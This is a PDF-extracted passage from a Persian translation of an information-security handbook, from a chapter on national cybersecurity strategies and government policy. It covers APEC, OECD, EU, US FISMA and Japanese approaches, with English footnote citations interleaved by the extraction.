47
ﻗﻄﻌﻨﺎﻣﻪ ﺩﺭ ﺟﻠﺴﻪ ﭼﻬﺎﺭﻡ ﺩﺭ ۱۰ﮊﻭﺋﻦ ۲۰۰۳ﺑﻪ ﺗﺼﻮﻳﺐ ﺭﺳﻴﺪ.
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﻳﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﺍﺻﻞ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ
ﻛﻨﻴﺪ .ﻧﺴﺨﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺘﺎﺏ ﺍﺻﻠﻲ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ
ﺍﺳﺖ:
http://www.infodev-security.net/handbook
Asia Pacific Economic Cooperation
Telecommunications and Information Working
Group
Development of an Inter-American Strategy to
Combat Threats to Cybersecurity, AG/RES.
)1939 (XXXIII-0/03
46
۴۹
ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﻩ ﺟﺰﺋﻴﺎﺕ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ:
APEC, "Statement on the Security of
"Information & Communications Infrastructure,
Fifth
APEC
Ministerial
Meeting
on
Telecommunications
ans
Information
Industry,Shanghai, China, May 29-30, 2002,
http://www.apecsec.org.sg/virtualib/minismtg/t
elminAnnexB_SICT.html
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﻳﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﺍﺻﻞ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ
ﻛﻨﻴﺪ .ﻧﺴﺨﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺘﺎﺏ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ:
http://www.infodev-security.net/handbook.
48
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
E-Security National Agenda [Australia],
September 2001,
http://www.noie.gov.au/projects/confidence/Pr
otecting/nat_agenda.htm
European Commission, Proposal for a
Regulation of the European Parliament & of
the Council - Establishing the European
Network & Information Security Agency, Feb.
11, 2003, COM (2003) 63 Final, 2003/0032
(COD),
http://europa.eu.int/information_society/eeuro
pe/action_plan/safe/documents/nisa_en.pdf
ﺁﻣﺮﻳﻜﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺳﺘﻴﺎﺑﻲ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ
ﺷﺒﻜﻪﻫﺎ ﺗﺪﻭﻳﻦ ﻧﻤﻮﺩ ٤٦.ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﻭ ﺗﻮﺳـﻌﺔ ﺍﻗﺘـﺼﺎﺩﻱ
) ٤٧(OECDﻧﻴﺰ ﺧـﻂﻣـﺸﻲﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺩﻭﻟﺘﻬـﺎ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ
ﺧﺼﻮﺻﻲ ﺩﺭ ﺧﺼﻮﺹ ﺗﻬﻴﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﻣﻨﺘـﺸﺮ
٤٨
ﺳﺎﺧﺖ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٤٠
ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﻣﻮﻗﻌﻴﺘﻬﺎ ﻭ ﻧﻘﺶ
٥٠
ﺧﻮﺩ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ".
•
ﺗﺠﺮﺑﻴﺎﺕ ،ﺭﺍﻫﺒﺮﺩﻫﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺗﻌﺪﺍﺩ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ
ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ،ﺑـﺼﻮﺭﺕ ﺩﺍﻭﻃﻠﺒﺎﻧـﻪ ﻭ ﻣﺒﺘﻨـﻲ ﺑـﺮ
ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺗﻬﻴﻪ ﺷﻮﺩ ﻭ ﺗﺠﺮﺑﻴﺎﺕ ﺍﺯ ﻃﺮﻳـﻖ ﻣﺆﺳـﺴﺎﺕ
ﻣﺸﺎﻭﺭ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﺗﻮﺳـﻌﻪ ﻳﺎﺑـﺪ.
ﺍﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍﻫﻨﻤﺎﻱ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﺍﺧﻠﻲ
ﺩﻭﻟﺖ ﻫﺴﺘﻨﺪ .ﺩﻭﻟﺖ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﺩ ﻭ ﻧﺒﺎﻳـﺪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ
٥١
ﻓﻨﻲ ﺑﺮﺍﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﻌﻴﻴﻦ ﻛﻨﺪ.
•
ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ
ﻼ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ
ﻛﺎﻣ ﹰ
ﺑﺎ ﺑﻲﺗﻮﺟﻬﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻧﺴﺒﺖ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺣﻤـﻼﺕ
ﻣﻮﺍﺟﻪ ﺷﺪﻩ ﺍﺳـﺖ .ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺑﺎﻳـﺪ
ﺗﺸﻮﻳﻖ ﺷﻮﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺎ ﺳـﺎﻳﺮ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﻳﻦ ﺑﺨﺶ ،ﺑﺎ ﺩﻭﻟﺖ ،ﻭ ﻧﻴﺰ ﺑﺎ ﺳـﺎﻳﺮ ﻛـﺸﻮﺭﻫﺎ
ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ.
•
ﺁﻣﻮﺯﺵ ﻭ ﭘﺮﻭﺭﺵ
ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺁﺳـﻴﺎ )(APEC
ﻣﻲﮔﻮﻳﺪ" :ﺗﻮﺳﻌﺔ ﻣﻨﺎﺑﻊ ﺍﻧـﺴﺎﻧﻲ ﺑـﺮﺍﻱ ﺑـﻪ ﺛﻤـﺮ ﺭﺳـﻴﺪﻥ
ﺗﻼﺷﻬﺎ ﺩﺭ ﺟﻬﺖ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴـﺖ ﺍﻣـﺮﻱ ﺿـﺮﻭﺭﻱ
ﺍﺳﺖ .ﺑﻤﻨﻈﻮﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ،ﺩﻭﻟﺘﻬـﺎ ﻭ
ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺁﻧﻬﺎ ﺑﺎﻳـﺪ ﻛﺎﺭﻛﻨـﺎﻥ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻣـﻮﺭﺩ
ﻣﻮﺿــﻮﻋﺎﺕ ﭘﻴﭽﻴــﺪﺓ ﻓﻨــﻲ ﻭ ﻗــﺎﻧﻮﻧﻲ ﺑــﺎ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ
APEC Cybersecurity Strategy,
http://www.apecsec.org.sg/content/apec/apec
_groups/working_groups/telecommunications
_and_information.html
Council of European Union, Council
Resolution of 28 January 2002 on a common
approach & specific actions in the area of
network & information security, (2002/C 43/02),
http://www.europa.eu.int/information_society/e
europe/action_plan/safe/netsecres_en.pdf
۵۱
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﻢ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﻭ ﻫﻢ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺍﺳﺖ ،ﺍﻣﺎ ﭼﻨـﻴﻦ ﻣـﻲﮔﻮﻳـﺪ ﻛـﻪ
ﺩﻭﻟﺖ ﻧﺒﺎﻳﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﺤﻤﻴـﻞ
ﻛﻨﺪ .ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
The National Strategy to Secure Cyberspace
[U.S.], February 2003, pp. 11, 15
http://www.whitehouse.gov/pcipb
http://www.dhs.gov/interweb/assetlibrary/Natio
nal_Cyberspace_Strategy.pdf
50
ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ﻭ ﺟـﺮﺍﺋﻢ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺁﻣـﻮﺯﺵ
ﺩﻫﻨﺪ".
٥٢
•
ﺍﻫﻤﻴﺖ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ
ﺷﺒﻜﻪﻫﺎﻱ ICTﺩﺍﺩﻩﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﺣـﺴﺎﺱ ﺷﺨـﺼﻲ ﺭﺍ
ﺍﻧﺘﻘﺎﻝ ﻣﻲ ﺩﻫﻨﺪ ﻭ ﺫﺧﻴﺮﻩ ﻣﻲﺳﺎﺯﻧﺪ .ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺟﺰﺀ
ﺿﺮﻭﺭﻱ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﺳـﺖ ﻭ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ
ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺳﺎﺯﮔﺎﺭ ﺑﺎ ﺍﺭﺯﺷﻬﺎﻱ
٥٣
ﻣﻬﻢ ﺟﺎﻣﻌﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﺩ.
•
ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ،ﻫﺸﺪﺍﺭ ﻭ ﻋﻜﺲﺍﻟﻌﻤﻞ
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜـﺎﺭﻱ ﺍﻗﺘـﺼﺎﺩﻱ
ﺁﺳﻴﺎ ﺍﺑﺮﺍﺯ ﺩﺍﺷﺖ" :ﻣﺒﺎﺭﺯﺓ ﻣﺆﺛﺮ ﺑﺎ ﺗﺨﻠﻔﺎﺕ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ
ﻭ ﺣﻔﺎﻇـــﺖ ﺍﺯ ﺍﻃﻼﻋـــﺎﺕ ﺯﻳﺮﺳـــﺎﺧﺘﻲ ،ﻭﺍﺑـــﺴﺘﻪ ﺑـــﻪ
ﺍﻗﺘــﺼﺎﺩﻫﺎﻳﻲ ﺍﺳــﺖ ﻛــﻪ ﺳﻴــﺴﺘﻤﻬﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﺭﺯﻳــﺎﺑﻲ
ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎ ﺩﺍﺭﻧـﺪ ﻭ ﻫـﺸﺪﺍﺭﻫﺎﻱ ﻻﺯﻡ ﺭﺍ
ﺻﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ .ﺑﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ
ﻳﻚ ﺗﻬﺪﻳﺪ ﻗﺒﻞ ﺍﺯ ﺁﻧﻜﻪ ﻣﻮﺟﺐ ﺁﺳﻴﺐ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺷـﻮﺩ،
ﺷﺒﻜﻪﻫﺎ ﺑﻬﺘﺮ ﻣﺤﺎﻓﻈﺖ ﻣﻲﺷﻮﻧﺪ ٥٤".ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻳﺎﻻﺕ
ﻣﺘﺤﺪﻩ ﺍﺯ ﻋﻤﻮﻡ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﺧﻮﺍﺳﺘﻪ ﺑﻮﺩ ﺩﺭ ﺍﻳﺠﺎﺩ ﻳـﻚ
ﺳﻴﺴﺘﻢ ﻛﻪ ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﭘﺎﺳﺨﮕﻮﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﺷـﺪ
ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ ﺗﺎ ﺣﻤﻼﺕ ﻭﺍﺭﺩ ﺑﻪ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺑﺴﺮﻋﺖ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﻧﺪ.
•
ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ
ﺑﺮﺍﻱ ﺳﺎﺩﻩﺗﺮ ﻛـﺮﺩﻥ ﺗﺒـﺎﺩﻝ ﻧﻈـﺮ ﻭ ﻫﻤﻜـﺎﺭﻱ ﺩﺭ ﻣـﻮﺭﺩ
ﮔﺴﺘﺮﺵ ﻳﻚ "ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺘـﻲ" ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ
ﺧﺼﻮﺻﻲ ﺩﺭ ﺳﻄﺢ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ،ﺩﻭﻟﺘﻬﺎ ﺑﺎﻳـﺪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ
ﻫﻤﻜﺎﺭﻱ ﻛﻨﻨﺪ ﺗـﺎ ﺑـﺮﺍﻱ ﺟـﺮﺍﺋﻢ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﻗـﻮﺍﻧﻴﻦ
ﺳــﺎﺯﮔﺎﺭﻱ ﺑــﻪ ﺗــﺼﻮﻳﺐ ﺑﺮﺳــﺎﻧﻨﺪ ﻭ ﻧﻴﺮﻭﻫــﺎﻱ ﺍﻧﺘﻈــﺎﻣﻲ
Respect for Privacy
OECD Guidelines for the Security of
Information Systems and Networks: Towards
a Culture of Security, July 25, 2002,
http://www.oecd.org/pdf/M00034000/M000340
00.pdf
52
53
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ ﺑـﻪ ﺁﺩﺭﺳـﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﭘـﺎﻭﺭﻗﻲ ﺷـﻤﺎﺭﻩ ۴۸
ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ.
APEC Cybersecurity Strategy,
http://www.apecsec.org.sg/content/apec/apec
_groups/working_groups/telecommunications
_and_information.html
54
٢٤١
ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﺎﻳﺪ ﺍﺯ ﻃﺮﻳﻖ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ
٥٥
ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ.
ﺭﻭﻧﺪ ﺗﻮﺳﻌﻪ ﻭ ﺍﺟﺮﺍﻱ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑـﺮﺍﻱ ﺩﻭﻟـﺖ،
ﻋﻨﺎﺻﺮ ﻣﺸﺘﺮﻛﻲ ﺑﺎ ﺗﻮﺳﻌﻪ ﻭ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﺔ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﺩﺭ
ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺍﻓﺮﺍﺩ ﺣﻘﻮﻗﻲ ﺩﺍﺭﺩ:
•
•
•
•
•
•
•
ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ؛
ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺁﮔﺎﻫﻲ؛
ﮔﻤــﺎﺭﺩﻥ ﻳﻜﻨﻔــﺮ ﺑﻌﻨــﻮﺍﻥ ﻓﺮﻣﺎﻧــﺪﻩ ﺑــﺮﺍﻱ ﺍﻳﺠــﺎﺩ
ﻫﻤﺎﻫﻨﮕﻲ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎ؛
٥٦
ﺗﻮﺳﻌﺔ ﺑﺮﻧﺎﻣﺔ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ ؛
ﺗﻄﺒﻴﻖ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ؛
ﺗﻮﺟﻴﻪ ﺳﺎﺧﺘﺎﺭﻱ؛ ﻭ
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﺩﻭﺭﻩﺍﻱ ﻭ ﺍﺭﺗﻘﺎﻱ ﻣﺪﺍﻭﻡ.
Meeting of G8 Ministers of Justice & Home
Affairs, Paris, May 5, 2003,
http://www.g8.utoronto.ca/justice/justice03050
5.htm
Risk Management
Ministerial Council for Promoting the
Digitization of Public Administration
http://www.kantei.go.jp/foreign/it/
network/priority-all/7.html
Federal Information Security Management Act
ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﺩﺭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ -ﺭﺍﻫﻜﺎﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ
ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻭﻟﺖ
ﺑﺎ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮﻱ ﻣﺸﺨﺺ ﺷﺪﻩ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻣﺼﻮﺑﺔ ﻣـﺪﻳﺮﻳﺖ
٦٢
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ )ﻣﺼﻮﺏ ﺳﺎﻝ (۲۰۰۲ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷـﺪﻩ ﺍﺳـﺖ.
ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺑﺮﺧﻲ ﺭﻭﺷﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺑـﻪ
ﺗﺼﻮﻳﺮ ﻣﻲ ﻛﺸﺪ ﻛﻪ ﺑﺎﻋﺚ ﻣـﻲﺷـﻮﻧﺪ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ
"ﭘﺎﺳﺨﮕﻮﻳﻲ" ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ.
ﻫﺪﻑ ﻣﺸﺨﺺ FISMAﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺩﺭ ﮔـﺴﺘﺮﺓ
ﺩﻭﻟﺖ ﺍﺳﺖ ،ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻫﻤﺔ ﺗﻼﺷﻬﺎﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑـﺮﺍﻱ
ﺍﻳﻤــﻦﺳــﺎﺯﻱ ﺍﻃﻼﻋــﺎﺕ ﺑــﺎ ﻳﻜــﺪﻳﮕﺮ ﻫﻤﺎﻫﻨــﮓ ﺷــﻮﻧﺪ ﻭ ﻧﻴــﺰ
ﺭﺍﻫﻜﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻬﻴﻪ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺣﺪﺍﻗﻞ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻻﺯﻡ ﺟﻬـﺖ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻭﻟـﺖ ﺍﺭﺍﺋـﻪ ﮔـﺮﺩﺩ .ﻗـﺎﻧﻮﻥ
ﺗﺼﺪﻳﻖ ﻣﻲﻛﻨﺪ ﻛـﻪ ﻣﺤـﺼﻮﻻﺕ ﺗﺠـﺎﺭﻱ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻣـﺆﺛﺮ ﻭ
ﭘﻮﻳﺎﻳﻲ ﺑﺮﺍﻱ ﺩﻭﻟـﺖ ﻓـﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﻧﺪ ﻭ ﺍﻧﺘﺨـﺎﺏ ﺭﺍﻩﺣﻠﻬـﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺗﺨﺼﺼﻲ ﻭﺍﮔﺬﺍﺭ ﻣﻲﮔﺮﺩﺩ.
FISMAﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺭﺋﻴﺲ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﻳـﺪ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺣﻴﻄﺔ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺗﻬﻴـﻪ ،ﻣـﺴﺘﻨﺪﺳﺎﺯﻱ ﻭ
ﺍﺟﺮﺍ ﻛﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻛﺎﺭﻫﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺍﺯ ﺟﻤﻠـﻪ ﺁﻧﺪﺳـﺘﻪ ﻛـﻪ
ﺗﻮﺳﻂ ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ﻣﺪﻳﺮﻳﺖ ﻣـﻲﺷـﻮﺩ ﺭﺍ ﺩﺭ ﺑـﺮ ﺑﮕﻴـﺮﺩ ٦٣.ﺍﻳـﻦ
ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﺎﺷﺪ:
•
Federal Information Security Management
Act, Title III of E-Government Act of 2002,
Pub. Law 107-347,
http://csrc.nist.gov/policies/FISMA-final.pdf
Auditing
55
56
57
58
59
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺘﻨﺎﻭﺏ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﻣﻴﺰﺍﻥ ﺁﺳـﻴﺒﻲ ﻛـﻪ ﻣﻤﻜـﻦ
٦٤
ﺍﺳﺖ ﺑﻪ ﺩﻻﻳﻠـﻲ ﭼـﻮﻥ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ )ﺍﺳـﺘﻔﺎﺩﻩ،
۶۲
60
61
ﺑﻪ ﭘﺎﻭﺭﻗﻲ ﻗﺒﻠﻲ ﻣﺮﺍﺟﻌﻪ ﺷﻮﺩ ،ﻭ ﻧﻴﺰ:
http://www.fedcirc.gov/library/legislations/FIS
MA.html
Title 44, United States Code, section 3544
Unauthorized Access
63
64
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﻓــﺎﺯ ﭼﻬــﺎﺭﻡ )ﺑــﺎ ﺗﻤﺮﻛــﺰ ﺑــﺮ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﺩﻭﻟﺘــﻲ( ﺍﻋــﻼﻡ
ﺧﻂﻣﺸﻲﻫﺎﻱ ﻭ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺳـﺖ.
ﺑﺮﺧــﻲ ﻛــﺸﻮﺭﻫﺎ ﻣﺜــﻞ ﮊﺍﭘــﻦ ﻭ ﺍﻳﺘﺎﻟﻴــﺎ ﺍﺯ ﻃﺮﻳــﻖ ﭼﻨــﻴﻦ
ﺧﻂﻣﺸﻲﻫﺎﻳﻲ ﺑﻪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﭘﺮﺩﺍﺧﺘـﻪﺍﻧـﺪ .ﺩﺭ ﺟـﻮﻻﻱ ﺳـﺎﻝ
۲۰۰۰ﻛﻤﻴﺘﺔ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﮊﺍﭘـﻦ ﺩﺭ ﺳـﻄﺢ
ﻛﺎﺑﻴﻨﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ
ﺍﺗﺨﺎﺫ ﻛﺮﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﺍﺯ ﺗﻤﺎﻣﻲ ﺍﺩﺍﺭﺍﺕ ﻭ ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫـﺎ ﺧﻮﺍﺳـﺘﻪ
